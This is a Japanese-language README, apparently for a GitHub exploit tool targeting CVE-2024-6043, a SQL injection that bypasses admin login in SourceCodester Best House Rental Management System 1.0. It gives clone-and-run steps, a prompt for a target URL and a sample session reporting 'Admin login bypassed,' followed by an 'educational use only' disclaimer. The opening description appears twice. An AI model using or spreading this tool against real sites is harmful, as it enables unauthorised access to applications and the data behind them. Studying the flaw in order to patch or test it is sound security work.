
このPythonツールは、SourceCodester Best House Rental Management System 1.0 に影響を及ぼす CVE-2024-6043 の脆弱性を悪用します。この脆弱性により、リモートの攻撃者は `admin_class.php` ファイルを介して SQL インジェクションを実行でき、特に `username` パラメータを標的とします。
このPythonツールは、SourceCodester Best House Rental Management System 1.0 に影響を与える CVE-2024-6043 の脆弱性を悪用します。この脆弱性により、リモートの攻撃者は admin_class.php ファイルを介してSQLインジェクションを実行でき、特にログイン機能の username パラメータを標的にします。このツールは、脆弱なエンドポイントを検出し、認証をバイパスするペイロードを注入するプロセスを自動化します。
admin_class.php ファイルが存在するかどうかを確認します。git clone https://github.com/lfillaz/CVE-2024-6043.git
cd CVE-2024-6043
ツールを実行します:
python CVE-2024-6043.py
ターゲットURLを入力します:
プロンプトが表示されたら、ターゲットサイトのURLを入力します(例: http://target-site.com)。
インジェクションプロセス:
admin_class.php パスが存在するかどうかを確認します。 ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔════╝ ██╔═████╗██║ ██║╚════██╗
██║ ██║ ██║█████╗ █████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗███████╗ ██║██╔██║███████║ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝ ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══██╗████╔╝██║╚════██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝╚██████╔╝ ██║██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝╚═════╝
BY @GhostByte discord.gg/byt
$ python CVE-2024-6043.py
Enter the target site (e.g., http://target-site.com): http://example.com
Checking if http://example.com/admin_class.php exists...
The path exists.
Do you want to inject the payload? (Y/N): y
Injecting... Done.
SQL Injection successful! Admin login bypassed.
このツールは教育目的のみを対象としています。責任を持って使用し、明示的なテスト許可があるシステムでのみ使用してください。このツールの誤用は法的結果を招く可能性があります。